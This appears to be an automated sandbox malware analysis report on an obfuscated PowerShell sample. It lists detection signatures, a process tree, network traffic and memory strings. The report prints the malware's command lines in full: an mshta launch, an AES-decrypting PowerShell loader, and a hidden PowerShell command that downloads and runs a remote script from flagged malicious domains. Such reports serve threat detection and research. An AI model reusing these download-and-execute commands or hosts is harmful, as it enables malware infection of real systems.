Windows Analysis Report
#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1

Overview

General Information

Sample name: #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1
(renamed because original name is a hash value)
Original sample name: .ps1
Analysis ID: 1580443
MD5: ce91da6730103e8f7311290bc43c20ad
SHA1: 6e512fd63d482dc1e5fc02f91a45a56681a4f430
SHA256: 5c82bdcc335fd2663b57278bda53c2f7b1a3c561e47e77807f3dd937aaa8e577
Tags: ps1, user-zhuzhu0009
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Bypasses PowerShell execution policy
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7560 cmdline: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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d=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7872 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7752
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x1c5cc:$b1: ::WriteAllBytes(
  • 0x1cc73:$b1: ::WriteAllBytes(
  • 0x1c681:$s1: -join
  • 0x1cd28:$s1: -join
  • 0x35282:$s1: -join
  • 0x42503:$s1: -join
  • 0x459c5:$s1: -join
  • 0x4605f:$s1: -join
  • 0x47b5b:$s1: -join
  • 0x49daf:$s1: -join
  • 0x4a5d6:$s1: -join
  • 0x4ae31:$s1: -join
  • 0x4b56c:$s1: -join
  • 0x4b59e:$s1: -join
  • 0x4b5e6:$s1: -join
  • 0x4b605:$s1: -join
  • 0x4be56:$s1: -join
  • 0x4bfd2:$s1: -join
  • 0x4c04a:$s1: -join
  • 0x4c0dd:$s1: -join
  • 0x4c343:$s1: -join

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7404, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4, ProcessId: 7560, ProcessName: mshta.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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d=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E9
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", ProcessId: 7404, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", ProcessId: 7404, ProcessName: powershell.exe
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd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d=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E9
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7672, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: https://pawpaws.readit-carfanatics.com/madonna.mp4/E | Avira URL Cloud: Label: malware
Source: https://pawpaws1.readit-carfanatics.com/madonna.vstx | Avira URL Cloud: Label: malware
Source: http://pawpaws1.readit-carfanatics.com | Avira URL Cloud: Label: malware
Source: https://pawpaws1.readit-carfanatics.com | Avira URL Cloud: Label: malware
Source: https://pawpaws.readit-carfanatics.com/madonna.mp4 | Avira URL Cloud: Label: malware
Source: https://pawpaws.readit-carfanatics.com/madonna.mp4... | Avira URL Cloud: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
Source: unknown | HTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1769565150.0000000003319000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb//: source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb. source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\dll\System.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: global traffic | HTTP traffic detected: GET /madonna.vstx HTTP/1.1 | Host: pawpaws1.readit-carfanatics.com | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /madonna.mp4 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pawpaws.readit-carfanatics.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /madonna.mp4 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pawpaws.readit-carfanatics.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /madonna.vstx HTTP/1.1 | Host: pawpaws1.readit-carfanatics.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: pawpaws.readit-carfanatics.com
Source: global traffic | DNS traffic detected: DNS query: pawpaws1.readit-carfanatics.com
Source: svchost.exe, 00000003.00000002.2911938505.000001EB7740F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1711652478.000001EB772D8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1711652478.000001EB772D8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1711652478.000001EB772D8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1711652478.000001EB7730D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1790101993.00000000098FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pawpaws1.readit-carfanatics.com
Source: powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04A5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1738683834.0000018900F17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.0000000006479000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04EF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.X
Source: mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/
Source: mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/eE
Source: mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1 | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: mshta.exe, 00000002.00000003.1790913512.000001C9A1D6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792017935.000001C9A1D6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4(
Source: mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4-
Source: mshta.exe, 00000002.00000002.1805106055.000001C99EA75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4...
Source: mshta.exe, 00000002.00000003.1779290701.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4...F
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4/E
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp41
